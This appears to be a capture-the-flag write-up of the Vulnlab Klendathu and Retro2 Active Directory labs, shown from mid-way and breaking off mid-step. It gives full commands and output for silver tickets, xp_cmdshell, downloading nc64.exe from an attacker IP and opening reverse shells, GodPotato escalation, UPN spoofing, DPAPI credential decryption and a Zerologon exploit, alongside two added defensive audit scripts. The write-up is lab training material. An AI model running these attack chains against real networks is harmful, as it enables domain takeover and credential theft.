$ iconv -f ASCII -t UTF-16LE <(printf "st<redacted>99") | openssl dgst -md4
MD4(stdin)= e2<redacted>2c
Create the silver ticket.
$ impacket-ticketer -nthash e2<redacted>2c -spn MSSQLSvc/SRV1.KLENDATHU.VL -domain KLENDATHU.VL -domain-sid S-1-5-21-641890747-1618203462-755025521 administrator
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

[*] Creating basic skeleton ticket and PAC Infos
[*] Customizing ticket for KLENDATHU.VL/administrator
[*] 	PAC_LOGON_INFO
[*] 	PAC_CLIENT_INFO_TYPE
[*] 	EncTicketPart
[*] 	EncTGSRepPart
[*] Signing/Encrypting final ticket
[*] 	PAC_SERVER_CHECKSUM
[*] 	PAC_PRIVSVR_CHECKSUM
[*] 	EncTicketPart
[*] 	EncTGSRepPart
[*] Saving ticket in administrator.ccache

$ export KRB5CCNAME=administrator.ccache
Once in the MSSQL shell, first run:
# Enable xp_cmdshell
> EXEC sp_configure 'Show Advanced Options', 1; RECONFIGURE; EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE;

# Verify we have SeImpersonatePrivilege
> xp_cmdshell "whoami /priv"
$ impacket-mssqlclient srv1.klendathu.vl -windows-auth -k
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(SRV1\SQLEXPRESS): Line 1: Changed database context to 'master'.
[*] INFO(SRV1\SQLEXPRESS): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server (160 3232)
[!] Press help for extra shell commands
SQL (KLENDATHU.VL\administrator  dbo@master)>
SQL (KLENDATHU.VL\administrator  dbo@master)> xp_cmdshell "echo IWR http://10.8.2.138:8000/nc64.exe -OutFile %TEMP%\nc64.exe | powershell -noprofile"
output
--------------------------------------------------------------------------------
PS C:\Windows\system32> IWR http://10.8.2.138:8000/nc64.exe -OutFile C:\Users\RASCZAK\AppData\Local\Temp\nc64.exe

PS C:\Windows\system32>

SQL (KLENDATHU.VL\administrator  dbo@master)> xp_cmdshell "%TEMP%\nc64.exe 10.8.2.138 9001 -e powershell"
Getting the reverse shell:
$ rlwrap nc -nlvp 9001
listening on [any] 9001 ...
connect to [10.8.2.138] from (UNKNOWN) [10.10.220.150] 55835
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.

Install the latest PowerShell for new features and improvements! https://aka.ms/PSWindows

PS C:\Windows\system32> whoami /all
whoami /all

USER INFORMATION
----------------

User Name         SID
================= ============================================
klendathu\rasczak S-1-5-21-641890747-1618203462-755025521-1131
GodPotato for privesc:
PS C:\temp> ./god.exe -cmd "cmd /c C:\temp\nc64.exe 10.8.2.138 9002 -e powershell"
./god.exe -cmd "cmd /c C:\temp\nc64.exe 10.8.2.138 9002 -e powershell"
[*] CombaseModule: 0x140725375598592
[*] DispatchTable: 0x140725378185544
[*] UseProtseqFunction: 0x140725377480928
[*] UseProtseqFunctionParamCount: 6
[*] HookRPC
[*] Start PipeServer
[*] Trigger RPCSS
[*] CreateNamedPipe \\.\pipe\314ec62a-eb25-45da-88cd-6f362aabd8cc\pipe\epmapper
[*] DCOM obj GUID: 00000000-0000-0000-c000-000000000046
[*] DCOM obj IPID: 00003002-0ca4-ffff-4078-59003fb3e6aa
[*] DCOM obj OXID: 0xb95cceeab6278323
[*] DCOM obj OID: 0xed06ad8662383e60
[*] DCOM obj Flags: 0x281
[*] DCOM obj PublicRefs: 0x0
[*] Marshal Object bytes len: 100
[*] UnMarshal Object
[*] Pipe Connected!
[*] CurrentUser: NT AUTHORITY\NETWORK SERVICE
[*] CurrentsImpersonationLevel: Impersonation
[*] Start Search System Token
[*] PID : 884 Token:0x772  User: NT AUTHORITY\SYSTEM ImpersonationLevel: Impersonation
[*] Find System Token : True
[*] UnmarshalObject: 0x80070776
[*] CurrentUser: NT AUTHORITY\SYSTEM
[*] process start with pid 1092
Getting the elevated reverse shell:
$ rlwrap nc -nlvp 9002
listening on [any] 9002 ...
connect to [10.8.2.138] from (UNKNOWN) [10.10.220.150] 55972
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.

Install the latest PowerShell for new features and improvements! https://aka.ms/PSWindows

PS C:\temp> whoami
whoami
nt authority\system
PS C:\temp> hostname
hostname
SRV1
PS C:\users> cmd -c 'dir /A'
cmd -c 'dir /A'
Microsoft Windows [Version 10.0.20348.2402]
(c) Microsoft Corporation. All rights reserved.

C:\users>
C:\Users\Administrator\Desktop>type flag.txt
type flag.txt
VL{9f<redacted>ef}
Spoofing Domain Users On GSSAPI Authentication
Checking BloodHound outbound control for RASCZAK, we have GenericWrite and ForceChangePassword on two domain users, rico and ibanez. With this ACL we can change their password using rpcclient or net rpc.
$ net rpc password "ibanez" 'Summer2024!' -U "dc1.klendathu.vl"/"Rasczak"%"st<redacted>99" -S "10.10.220.149"
Verifying the credentials:
$ crackmapexec smb 10.10.220.149 -u 'ibanez' -p 'Summer2024!'
SMB         10.10.220.149   445    DC1              [*] Windows Server 2022 Build 20348 x64 (name:DC1) (domain:KLENDATHU.VL) (signing:True) (SMBv1:False)
SMB         10.10.220.149   445    DC1              [+] KLENDATHU.VL\ibanez:Summer2024!
There is research by Ceri Coburn from Pen Test Partners on Linux servers joined to AD whose authentication mechanism is misconfigured to use the enterprise name type (NT_ENTERPRISE). If we have GenericWrite on a domain user, we can edit its userPrincipalName attribute, which is the attribute an NT_ENTERPRISE lookup matches on, and through it spoof other domain users. To abuse this we first need to identify the user we will spoof: there is a group named LINUX_ADMINS with two members, flores and leivy. We then set the userPrincipalName to either of those two users; to add this attribute we use ldapmodify, which needs an LDIF file.
$ ldapmodify -H ldap://dc1.klendathu.vl -a -x -D "CN=RASCZAK,CN=USERS,DC=KLENDATHU,DC=VL" -W -f ./modify_user.ldif
Enter LDAP Password: st<redacted>99
modifying entry "CN=ibanez,CN=users,DC=klendathu,DC=vl"
$ cat modify_user.ldif
dn: CN=ibanez,CN=users,DC=klendathu,DC=vl
changetype: modify
add: userPrincipalName
userPrincipalName: leivy
Verify that the LDAP attribute was added correctly.
$ ldapsearch -x -H ldap://dc1.klendathu.vl -D "CN=ibanez,CN=USERS,DC=KLENDATHU,DC=VL" -w 'Summer2024!' -b "DC=klendathu,DC=vl" '(cn=ibanez)' | grep -I userPrincipalName
userPrincipalName: leivy
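As an added defensive example (not from the writeup), the Python below audits ldapsearch output for the condition the ldapmodify step above creates: a userPrincipalName whose prefix resolves to a different account, which is what an NT_ENTERPRISE lookup would match. The LDIF input is constructed; the realm and the LINUX_ADMINS member names come from the text.

```python
import base64

# Constructed `ldapsearch -x -LLL` output (not the lab's real dump); ibanez carries
# the bare UPN "leivy" that the ldapmodify step above sets.
SAMPLE_LDIF = """\
dn: CN=zim,CN=Users,DC=klendathu,DC=vl
sAMAccountName: zim
userPrincipalName: zim@klendathu.vl

dn: CN=leivy,CN=Users,DC=klendathu,DC=vl
sAMAccountName: leivy
userPrincipalName: leivy@klendathu.vl

dn: CN=flores,CN=Users,DC=klendathu,DC=vl
sAMAccountName: flores
userPrincipalName: flores@klendathu.vl

dn: CN=ibanez,CN=Users,DC=klendathu,DC=vl
sAMAccountName: ibanez
userPrincipalName: leivy

dn: CN=rico,CN=Users,DC=klendathu,DC=vl
sAMAccountName: rico
"""

REALM = "klendathu.vl"
LINUX_ADMINS = ("flores", "leivy")  # members of the group named in the text


def _finish(raw):
    """Decode 'attr:: base64' values and strip the rest once an entry is complete."""
    out = {}
    for key, value in raw.items():
        if value.startswith(":"):
            value = base64.b64decode(value[1:].strip()).decode("utf-8")
        out[key] = value.strip()
    return out


def parse_ldif(text):
    """Turn LDIF entries into dicts; handles the leading-space continuation lines
    ldapsearch emits for long values and the '::' base64 form."""
    entries, current, last_key = [], {}, None
    for line in text.splitlines():
        if not line.strip():
            if current:
                entries.append(_finish(current))
            current, last_key = {}, None
            continue
        if line.startswith(" ") and last_key:
            current[last_key] += line[1:]  # continuation of the previous value
            continue
        key, _, value = line.partition(":")
        key = key.strip()
        current[key] = value  # keep raw; a leading ':' marks base64
        last_key = key
    if current:
        entries.append(_finish(current))
    return entries


def audit_upns(entries, realm, privileged=()):
    """Findings for UPNs that let one account answer an NT_ENTERPRISE lookup meant
    for another: a missing or foreign realm suffix, a prefix equal to another
    account's sAMAccountName (CRITICAL when that account is privileged), or a UPN
    already used by another entry."""
    by_sam = {e["sAMAccountName"].lower(): e for e in entries if "sAMAccountName" in e}
    privileged = {p.lower() for p in privileged}
    seen, findings = {}, []
    for e in entries:
        sam, upn = e.get("sAMAccountName", "").lower(), e.get("userPrincipalName")
        if not sam or not upn:
            continue  # accounts without a UPN are matched by sAMAccountName only
        upn_l = upn.lower()
        prefix, _, suffix = upn_l.partition("@")
        if not suffix:
            findings.append(("HIGH", sam, "UPN %r has no realm suffix" % upn))
        elif suffix != realm.lower():
            findings.append(("MEDIUM", sam, "UPN %r has unexpected suffix %r" % (upn, suffix)))
        other = by_sam.get(prefix)
        if other is not None and other["sAMAccountName"].lower() != sam:
            sev = "CRITICAL" if prefix in privileged else "HIGH"
            findings.append((sev, sam, "UPN %r resolves to account %s"
                             % (upn, other["sAMAccountName"])))
        if upn_l in seen:
            findings.append(("HIGH", sam, "UPN %r duplicates entry %s" % (upn, seen[upn_l])))
        seen.setdefault(upn_l, sam)
    return findings


if __name__ == "__main__":
    for severity, sam, msg in audit_upns(parse_ldif(SAMPLE_LDIF), REALM, LINUX_ADMINS):
        print(severity, sam, msg)
```

The same parser works on the output of an ldapsearch such as the one above run with the filter (&(objectClass=user)(userPrincipalName=*)) and the attributes sAMAccountName userPrincipalName.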
I tried Rubeus, but this did not work for me.
c:\temp>Rubeus.exe asktgt /user:leivy /password:Summer2024! /principletype:enterprise
Rubeus.exe asktgt /user:leivy /password:Summer2024! /principletype:enterprise

  v2.3.2

[*] Action: Ask TGT

[*] Got domain: KLENDATHU.VL
[*] Using rc4_hmac hash: 72F0EEFCC213EA8F350773B831CF2C9C
[*] Building AS-REQ (w/ preauth) for: 'KLENDATHU.VL\leivy'
[*] Using domain controller: 10.10.220.149:88

[X] KRB-ERROR (24) : KDC_ERR_PREAUTH_FAILED:
Next I found how to add a -principal option to getTGT.py.
(puck㉿kali)-[~/vulnlab/klendathu]
$ git clone https://github.com/ar0x4/impacket.git
$ python3 -m venv venv
$ source venv/bin/activate
$ pip3 install -r requirements.txt
(venv)─(puck㉿kali)-[~/vulnlab/klendathu/impacket]
$ cp examples/getTGT.py .
(venv)─(puck㉿kali)-[~/vulnlab/klendathu/impacket]
$ python3 getTGT.py klendathu.vl/'leivy':'Summer2024!' -dc-ip 10.10.220.149 -principal NT_ENTERPRISE
Cannot determine Impacket version. If running from source you should at least run "python setup.py egg_info"
Impacket v? - Copyright 2023 Fortra

[*] Saving ticket in leivy.ccache
(venv)─(puck㉿kali)-[~/vulnlab/klendathu/impacket]
$ export KRB5CCNAME=leivy.ccache
(venv)─(puck㉿kali)-[~/vulnlab/klendathu/impacket]
$ klist
Ticket cache: FILE:leivy.ccache
Default principal: leivy@KLENDATHU.VL

Valid starting       Expires              Service principal
08/29/2024 16:21:31  08/30/2024 02:21:31  krbtgt/KLENDATHU.VL@KLENDATHU.VL
	renew until 08/30/2024 16:21:33
We need to modify our /etc/krb5.conf:
[libdefaults]
	default_realm = KLENDATHU.VL
	dns_lookup_realm = false
	dns_lookup_kdc = true

# The following krb5.conf variables are only for MIT Kerberos.
	kdc_timesync = 1
	ccache_type = 4
	forwardable = true
	proxiable = true
	rdns = false

[realms]
	KLENDATHU.VL = {
		kdc = dc1.klendathu.vl
		admin_server = dc1.klendathu.vl
	}

[domain_realm]
	.klendathu.vl = KLENDATHU.VL
	klendathu.vl = KLENDATHU.VL
Now we can SSH to srv2 using Kerberos authentication. After becoming root we go into /root/inc5543_domaincontroller_backup/ and transfer this backup to our Kali box.
(venv)─(puck㉿kali)-[~/vulnlab/klendathu/impacket]
$ ssh -K leivy@klendath.vl@srv2.klendathu.vl
Last failed login: Thu Aug 29 10:26:37 EDT 2024 from 10.8.2.138 on ssh:notty
There was 1 failed login attempt since the last successful login.
[leivy@KLENDATHU.VL@srv2 ~]$ id
uid=990001115(leivy@KLENDATHU.VL) gid=990000513(domain users@KLENDATHU.VL) groups=990000513(domain users@KLENDATHU.VL),990001106(linux_admins@KLENDATHU.VL) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023
[leivy@KLENDATHU.VL@srv2 /]$ sudo su
[root@srv2 /]# cd /root
[root@srv2 ~]# ls
anaconda-ks.cfg  flag.txt  inc5543_domaincontroller_backup
[root@srv2 ~]# cat flag.txt
VL{8c<redacted>fd}
[root@srv2 ~]# cd inc5543_domaincontroller_backup/
[root@srv2 inc5543_domaincontroller_backup]# ls
'Active Directory'   note.txt   registry
[root@srv2 inc5543_domaincontroller_backup]# cat note.txt
Incident: INC5543
I've included a backup of the domain controller before resetting all passwords after the last breach
[root@srv2 inc5543_domaincontroller_backup]#
Transfer the /tmp/krb5cc_990001135 file to Kali as well.
Decrypting RDCMan password
┌──(puck㉿kali)-[~/vulnlab/klendathu]
└─$ export KRB5CCNAME=krb5cc_990001135

┌──(puck㉿kali)-[~/vulnlab/klendathu]
└─$ klist
Ticket cache: FILE:krb5cc_990001135
Default principal: svc_backup@KLENDATHU.VL

Valid starting       Expires              Service principal
08/29/2024 16:37:51  08/30/2024 02:37:51  krbtgt/KLENDATHU.VL@KLENDATHU.VL
	renew until 09/05/2024 16:37:51

┌──(puck㉿kali)-[~/vulnlab/klendathu]
└─$ impacket-smbclient klendathu.vl/svc_backup@dc1.klendathu.vl -k -no-pass
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

Type help for list of commands
# shares
ADMIN$
C$
HomeDirs
IPC$
NETLOGON
SYSVOL
# use HomeDirs
# cd Jenkins
# ls
drw-rw-rw-          0  Sat Apr 13 03:32:21 2024 .
drw-rw-rw-          0  Thu Apr 11 02:58:10 2024 ..
-rw-rw-rw-     101234  Sat Apr 13 03:32:11 2024 AppData_Roaming_Backup.zip
-rw-rw-rw-       1077  Fri Apr 12 06:08:35 2024 jenkins.rdg
# get jenkins.rdg
# get AppData_Roaming_Backup.zip
Decrypt a .rdg password using ntdissector and dpapilab
We transfer the contents of HomeDirs/Jenkins to our Kali box, unzip AppData_Roaming_Backup.zip and look at jenkins.rdg:
<?xml version="1.0" encoding="utf-8"?>
<RDCMan programVersion="2.93" schemaVersion="3">
  <file>
    <credentialsProfiles>
      <credentialsProfile inherit="None">
        <profileName scope="Local">KLENDATHU\administrator</profileName>
        <userName>administrator</userName>
        <password>AQ[...]ShAxQ==</password>
        <domain>KLENDATHU</domain>
      </credentialsProfile>
    </credentialsProfiles>
    <properties>
      <expanded>True</expanded>
      <name>jenkins</name>
    </properties>
    <server>
      <properties>
        <name>dc1.klendathu.vl</name>
      </properties>
      <logonCredentials inherit="None">
        <profileName scope="File">KLENDATHU\administrator</profileName>
      </logonCredentials>
    </server>
  </file>
  <connected />
  <favorites />
  <recentlyUsed />
</RDCMan>
So we have a DPAPI-encrypted password for KLENDATHU\administrator.
The extracted zip also contains the user's DPAPI master keys under ./Roaming/Microsoft/Protect/<SID>/. The blob can only be decrypted with the master key that protected it, and that master key is itself encrypted; because we have a backup of the DC we can recover the domain DPAPI backup key from NTDS with ntdissector and use it to unlock the master key.
I used an Ubuntu box for the decryption.
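Before chasing master keys it helps to know which one the .rdg blob actually needs: every DPAPI blob starts with the fixed DPAPI provider GUID followed by the GUID of the master key that protected it, and that GUID is the file name under Protect\<SID>\. The Python below is an added example, not code from the original post or from ntdissector/dpapilab-ng; the .rdg text, the master key GUID and the blob inside it are constructed test data (the real blob from the box is not reproduced), and only the header is modelled, not the encrypted part.

```python
import base64
import struct
import uuid
import xml.etree.ElementTree as ET

# Provider GUID that opens every DPAPI CryptProtectData blob.
DPAPI_PROVIDER_GUID = uuid.UUID("df9d8cd0-1501-11d1-8c7a-00c04fc297eb")


def build_dpapi_blob(masterkey_guid, description="", body=b"\x00" * 32):
    """Build a DPAPI blob with a valid header (constructed test data only).

    Layout: dwVersion, guidProvider, dwMasterKeyVersion, guidMasterKey,
    dwFlags, dwDescriptionLen, szDescription (UTF-16LE, NUL terminated),
    then the encrypted part, which this helper does not model.
    """
    desc = description.encode("utf-16-le") + b"\x00\x00"
    header = struct.pack("<I", 1)
    header += DPAPI_PROVIDER_GUID.bytes_le
    header += struct.pack("<I", 1)
    header += masterkey_guid.bytes_le
    header += struct.pack("<I", 0)
    header += struct.pack("<I", len(desc)) + desc
    return header + body


def is_dpapi_blob(blob):
    """True when the provider GUID sits at offset 4, as in every DPAPI blob."""
    return len(blob) >= 48 and uuid.UUID(bytes_le=blob[4:20]) == DPAPI_PROVIDER_GUID


def parse_dpapi_header(blob):
    """Return the header fields that tell you which master key protects this blob."""
    if not is_dpapi_blob(blob):
        raise ValueError("not a DPAPI blob")
    version, = struct.unpack_from("<I", blob, 0)
    mk_version, = struct.unpack_from("<I", blob, 20)
    mk_guid = uuid.UUID(bytes_le=blob[24:40])
    flags, desc_len = struct.unpack_from("<II", blob, 40)
    description = blob[48:48 + desc_len].decode("utf-16-le").rstrip("\x00")
    return {
        "version": version,
        "masterkey_version": mk_version,
        "masterkey_guid": str(mk_guid),
        "flags": flags,
        "description": description,
    }


def rdg_credentials(xml_text):
    """Map each RDCMan credential profile to the master key file it needs."""
    root = ET.fromstring(xml_text)
    found = []
    for prof in root.iter("credentialsProfile"):
        blob = base64.b64decode(prof.findtext("password") or "")
        header = parse_dpapi_header(blob)
        found.append({
            "profile": prof.findtext("profileName"),
            "user": prof.findtext("userName"),
            "domain": prof.findtext("domain"),
            "masterkey_guid": header["masterkey_guid"],
            # Master keys live at %APPDATA%\Microsoft\Protect\<user SID>\<GUID>.
            "masterkey_file": "Roaming/Microsoft/Protect/<SID>/" + header["masterkey_guid"],
        })
    return found


# Constructed sample: the layout RDCMan 2.93 writes, with a constructed blob.
SAMPLE_MK_GUID = uuid.UUID("5b3a4f1e-8c2d-4e6f-9a7b-0c1d2e3f4a5b")
SAMPLE_RDG = """<?xml version="1.0" encoding="utf-8"?>
<RDCMan programVersion="2.93" schemaVersion="3">
  <file>
    <credentialsProfiles>
      <credentialsProfile inherit="None">
        <profileName scope="Local">EXAMPLE\\administrator</profileName>
        <userName>administrator</userName>
        <password>{pw}</password>
        <domain>EXAMPLE</domain>
      </credentialsProfile>
    </credentialsProfiles>
  </file>
</RDCMan>
""".format(pw=base64.b64encode(build_dpapi_blob(SAMPLE_MK_GUID)).decode())

if __name__ == "__main__":
    for cred in rdg_credentials(SAMPLE_RDG):
        print(f"{cred['profile']}: needs master key {cred['masterkey_file']}")
```

Run it against a real jenkins.rdg by reading the file into `rdg_credentials`; if the GUID it prints is not present in the Protect\<SID>\ directory you pulled, the blob was protected on another profile or machine and no amount of backup-key work will open it.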
.
puck@edge-meppel:~$ python3 -m venv venv
puck@edge-meppel:~$ source venv/bin/activate
(venv) puck@edge-meppel:~$ cd ntdissector/
(venv) puck@edge-meppel:~/ntdissector$ ntdissector -h
usage: ntdissector [-h] [-V] [-system SYSTEM] -ntds NTDS [-bootKey BOOTKEY] [-outputdir OUTPUTDIR] [-cachedir CACHEDIR] [-f FILTER] [-filters] [-limit LIMIT] [-cn] [-debug] [-verbose] [-silent] [-ts] [-keepDel] [-w WORKERS] [-nocache] [-dryRun]

NTDS Dissector v1.0

options:
  -h, --help     show this help message and exit
  -V, --version  Display version info

Examples:
  > Dump users, groups and domain backup keys
  $ ntdissector -ntds NTDS.dit -system SYSTEM -outputdir /tmp/ntdissector/ -ts -f user,group,secret
  > Dump all records from the database
  $ ntdissector -ntds NTDS.dit -system SYSTEM -outputdir /tmp/ntdissector/ -ts -f all
  > Dump user objects and include deleted records
  $ ntdissector -ntds NTDS.dit -system SYSTEM -outputdir /tmp/ntdissector/ -ts -f user -keepDel
  > List object classes available to filter records
  $ ntdissector -ntds NTDS.dit -filters
(venv) puck@edge-meppel:~/ntdissector$ ntdissector -ntds /home/puck/ntds.dit -system /home/puck/SYSTEM -outputdir /tmp/test -ts -f all
[2024-08-30 15:25:27] [-] Couldn't load cache file /home/puck/.ntdissector/.cache/b872bd512882c00832b578725a57ca5c/__objectClassSchema.json -> [Errno 2] No such file or directory: '/home/puck/.ntdissector/.cache/b872bd512882c00832b578725a57ca5c/__objectClassSchema.json'
[2024-08-30 15:25:27] [*] Building the schemas, please wait...
[2024-08-30 15:25:29] [*] PEK # 0 found and decrypted: feab48d5655b005f0fed603c166c587f
[2024-08-30 15:25:29] [*] Filtering records with this list of object classes : ['all']
[2024-08-30 15:25:29] [*] Ignoring records marked as deleted
100%|████████████████████████████████| 3747/3747 [00:00<00:00, 7281.52rec./s]
[2024-08-30 15:25:30] [*] Finished, matched 3708 records out of 3747
[2024-08-30 15:25:30] [*] Processing 3708 serialization tasks
100%|████████████████████████████████| 3708/3708 [00:17<00:00, 192.28rec./s]
(venv) puck@edge-meppel:~/ntdissector$
.
(venv) puck@edge-meppel:/tmp/test/out/b872bd512882c00832b578725a57ca5c$ cat secret.json | jq
{
  "lastSetTime": "2024-04-10T23:33:43.254871+00:00",
  "priorSetTime": "2024-04-10T23:33:43.254871+00:00",
  "dSCorePropagationData": "1601-01-01T00:00:00+00:00",
  "isCriticalSystemObject": 1,
  "showInAdvancedViewOnly": 1,
  "distinguishedName": "CN=BCKUPKEY_e6630be8-09ee-4a28-bcb1-e725e585d832 Secret,CN=System,DC=KLENDATHU,DC=VL",
  "objectClass": [
    "secret",
    "leaf",
    "top"
  ],
  "replPropertyMetaData": "01000000000000000c000000000000000000000001000000d7b2271c03000000c98b69a9c485a44f8204cfa32ce1e18e2<redacted>0010500000000000515000000bb79422646d3736071c6002d00020000",
  "objectGUID": "2a015493-fc08-40bc-b15e-d6936ba6bc59",
  "objectCategory": "CN=Secret,CN=Schema,CN=Configuration,DC=KLENDATHU,DC=VL"
}
(venv) puck@edge-meppel:/tmp/test/out/b872bd512882c00832b578725a57ca5c$
rdgdecrypt: with the domain backup key exported as pvk.key, decrypt the profile's DPAPI blob; the master key directory is Protect/<SID of the user who saved the profile>:
(venv) puck@edge-meppel:~$ python3 ./rdgdec.py ./jenkins.rdg --masterkey /home/puck/Roaming/Microsoft/Protect/S-1-5-21-641890747-1618203462-755025521-1110 --sid S-1-5-21-641890747-1618203462-755025521-1110 -k ./pvk.key [+] Profile: KLENDATHU\administrator Username: administrator Domain: KLENDATHU Password: @@M<redacted>s@@ ------------------------------------------------------------------------------- [+] Decrypted 1 out of 1 credentials
What a ride !
used links:
https://github.com/ar0x4/impacket.git
https://github.com/synacktiv/ntdissector
https://github.com/tijldeneut/dpapilab-ng
.
vulnlab-retro2
Retro2 is an easy old-school Windows Server 2008 R2 DC. It involves decrypting an MS Access database, a pre-created computer account, GenericWrite, AddMember and Perfusion.exe.
nmap scan
# Nmap 7.93 scan initiated Wed Aug 28 09:41:18 2024 as: nmap -Pn -sC -sV -oN retro2.nmap 10.10.122.16 Nmap scan report for 10.10.122.16 Host is up (0.019s latency). Not shown: 988 filtered tcp ports (no-response) PORT STATE SERVICE VERSION 88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2024-08-28 07:41:28Z) 135/tcp open msrpc Microsoft Windows RPC 139/tcp open netbios-ssn Microsoft Windows netbios-ssn 389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: retro2.vl, Site: Default-First-Site-Name) 445/tcp open microsoft-ds Windows Server 2008 R2 Datacenter 7601 Service Pack 1 microsoft-ds (workgroup: RETRO2) 464/tcp open kpasswd5? 593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0 636/tcp open tcpwrapped 49154/tcp open msrpc Microsoft Windows RPC 49155/tcp open msrpc Microsoft Windows RPC 49157/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0 49158/tcp open msrpc Microsoft Windows RPC Service Info: Host: BLN01; OS: Windows; CPE: cpe:/o:microsoft:windows Host script results: | smb2-security-mode: | 210: |_ Message signing enabled and required |_clock-skew: mean: -40m00s, deviation: 1h09m16s, median: -1s | smb-os-discovery: | OS: Windows Server 2008 R2 Datacenter 7601 Service Pack 1 (Windows Server 2008 R2 Datacenter 6.1) | OS CPE: cpe:/o:microsoft:windows_server_2008::sp1 | Computer name: BLN01 | NetBIOS computer name: BLN01\x00 | Domain name: retro2.vl | Forest name: retro2.vl | FQDN: BLN01.retro2.vl |_ System time: 2024-08-28T09:42:17+02:00 | smb2-time: | date: 2024-08-28T07:42:18 |_ start_date: 2024-08-28T07:40:52 | smb-security-mode: | account_used: guest | authentication_level: user | challenge_response: supported |_ message_signing: required Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . # Nmap done at Wed Aug 28 09:42:57 2024 -- 1 IP address (1 host up) scanned in 99.04 seconds
Unintended path: Zerologon (CVE-2020-1472). The exploit resets the DC machine account (BLN01$) password to an empty string, which breaks the DC's secure channel; on a real engagement restore the original password from the dumped secrets afterwards. The intended path follows further below.
┌──(puck㉿kali)-[~/vulnlab/retro2]
└─$ python3 cve-2020-1472-exploit.py bln01 10.10.122.16
Performing authentication attempts...
===============================================================================================
Target vulnerable, changing account password to empty string

Result: 0

Exploit complete!
secretsdump with the now-empty BLN01$ password
┌──(puck㉿kali)-[~/vulnlab/retro2]
└─$ impacket-secretsdump -just-dc -no-pass bln01\$@10.10.122.16
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:c0<redacted>48:::
Intended path: enumerate SMB shares (a null/guest session works)
┌──(puck㉿kali)-[~/vulnlab/retro2] └─$ netexec smb 10.10.122.16 SMB 10.10.122.16 445 BLN01 [*] Windows Server 2008 R2 Datacenter 7601 Service Pack 1 x64 (name:BLN01) (domain:retro2.vl) (signing:True) (SMBv1:True)
.
┌──(puck㉿kali)-[~/vulnlab/retro2] └─$ netexec smb 10.10.122.16 -u 'puck' -p '' --shares SMB 10.10.122.16 445 BLN01 [*] Windows Server 2008 R2 Datacenter 7601 Service Pack 1 x64 (name:BLN01) (domain:retro2.vl) (signing:True) (SMBv1:True) SMB 10.10.122.16 445 BLN01 [+] retro2.vl\puck: SMB 10.10.122.16 445 BLN01 [*] Enumerated shares SMB 10.10.122.16 445 BLN01 Share Permissions Remark SMB 10.10.122.16 445 BLN01 ----- ----------- ------ SMB 10.10.122.16 445 BLN01 ADMIN$ Remote Admin SMB 10.10.122.16 445 BLN01 C$ Default share SMB 10.10.122.16 445 BLN01 IPC$ Remote IPC SMB 10.10.122.16 445 BLN01 NETLOGON Logon server share SMB 10.10.122.16 445 BLN01 Public READ SMB 10.10.122.16 445 BLN01 SYSVOL Logon server share
.
┌──(puck㉿kali)-[~/vulnlab/retro2] └─$ impacket-smbclient guest@retro2.vl -no-pass Impacket v0.12.0.dev1 - Copyright 2023 Fortra Type help for list of commands # use Public # ls drw-rw-rw- 0 Sat Aug 17 16:30:37 2024 . drw-rw-rw- 0 Sat Aug 17 16:30:37 2024 .. drw-rw-rw- 0 Sat Aug 17 16:30:37 2024 DB drw-rw-rw- 0 Sat Aug 17 13:58:07 2024 Temp # cd DB # ls drw-rw-rw- 0 Sat Aug 17 16:30:37 2024 . drw-rw-rw- 0 Sat Aug 17 16:30:37 2024 .. -rw-rw-rw- 876544 Sat Aug 17 16:30:34 2024 staff.accdb # get staff.accdb
If we open it with Microsoft Access, it prompts for a password. We use office2john to extract the hash and then crack it.
┌──(puck㉿kali)-[~/vulnlab/retro2]
└─$ office2john staff.accdb | tee officehash.txt
staff.accdb:$office$*2013*100000*256*16*5736<redacted>8235
┌──(puck㉿kali)-[~/vulnlab/retro2]
└─$ john officehash.txt --wordlist=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (Office, 2007/2010/2013 [SHA1 256/256 AVX2 8x / SHA512 256/256 AVX2 4x AES])
Cost 1 (MS Office version) is 2013 for all loaded hashes
Cost 2 (iteration count) is 100000 for all loaded hashes
Will run 8 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
0g 0:00:00:03 0.00% (ETA: 06:07:07) 0g/s 223.4p/s 223.4c/s 223.4C/s bambam..james1
cl<redacted>08        (staff.accdb)
Inside the Access database we find credentials:
strsUser = “retro2\ldapreader”
strsPassword = “pp<redacted>5R”
BloodHound analysis
bloodhound-python -d retro2.vl -c all -u ldapreader -p pp<redacted>5R -ns 10.10.122.16 --dns-tcp --zip
we find:
The computer Account FS01 is a member of the Domain Computers group. The Domain Computers group has GenericWrite over ADMWS01. ADMWS01 has the AddSelf permission over the Services group. Services group members can RDP to DC BLN01
.
We guess that FS01 is a pre-created computer account, whose password is the lowercase computer name without the $ (fs01). Such an account cannot be used to log on until its password has been changed, but the account is allowed to change its own password, so we do that over RPC with rpcchangepwd.py:
wget https://raw.githubusercontent.com/api0cradle/impacket/a1d0cc99ff1bd4425eddc1b28add1f269ff230a6/examples/rpcchangepwd.py
.
┌──(puck㉿kali)-[~/vulnlab/retro2] └─$ python3 rpcchangepwd.py retro2.vl/fs01\$:fs01@10.10.122.16 -newpass P@ssw0rd Impacket v0.12.0.dev1 - Copyright 2023 Fortra [*] Password was changed successfully.
Abuse the GenericWrite permission: as FS01$ (a member of Domain Computers) reset the password of ADMWS01$
